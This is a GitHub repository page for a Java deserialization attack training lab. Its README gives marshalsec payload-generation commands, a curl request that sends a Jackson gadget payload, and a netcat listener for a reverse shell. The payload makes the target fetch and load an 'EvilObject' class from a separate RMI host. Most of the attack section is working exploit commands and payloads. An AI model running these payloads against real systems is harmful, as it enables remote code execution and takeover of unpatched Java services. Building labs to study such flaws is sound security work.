Skip to content

ozkanbilge/Deserialization-Attacks

BranchesTags

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

2 Commits
rogue-endpoint
rogue-endpoint
 
 
vagrant
vagrant
 
 
vulnerable-endpoint
vulnerable-endpoint
 
 
README.md
README.md
 
 
pom.xml
pom.xml
 
 

Repository files navigation

Java Web Attacks Training Plattform

Introduction

You can use this plattform to develop and experiment with existing java web attacks.

JSON Deserialization

Payload Generation via marshalsec

java -cp marshalsec-0.0.1-SNAPSHOT-all.jar marshalsec.Jackson -a -v
java -cp marshalsec-0.0.1-SNAPSHOT-all.jar marshalsec.JsonIO -a -v

Exploitation Code

curl -x "" -H "Content-Type: application/json" -X POST -d '{"id":133,"object":["org.springframework.beans.factory.config.PropertyPathFactoryBean",{"targetBeanName":"rmi://192.168.34.42:1099/EvilObject","propertyPath":"foo","beanFactory": ["org.springframework.jndi.support.SimpleJndiBeanFactory",{"shareableResources":["rmi://192.168.34.42:1099/EvilObject"]}]}]}' http://192.168.34.9:8443/api/jackson

Reverse Shell

netcat -lkvp 31338

The vulnerable endpoint needs the permission to download the evil class file located in /exploit/EvilObject.class

-.-

-Dcom.sun.jndi.rmi.object.trustURLCodebase=true

Deserialization Details

Jackson

Jackson needs to enable the JacksonPolymorphicDeserialization to be affected against the deserialization vulnerability.

About

No description, website, or topics provided.

Resources

Readme
Activity

Stars

2 stars

Watchers

2 watching

Forks

1 fork
Report repository

Releases

No releases published

Packages

No packages published

Languages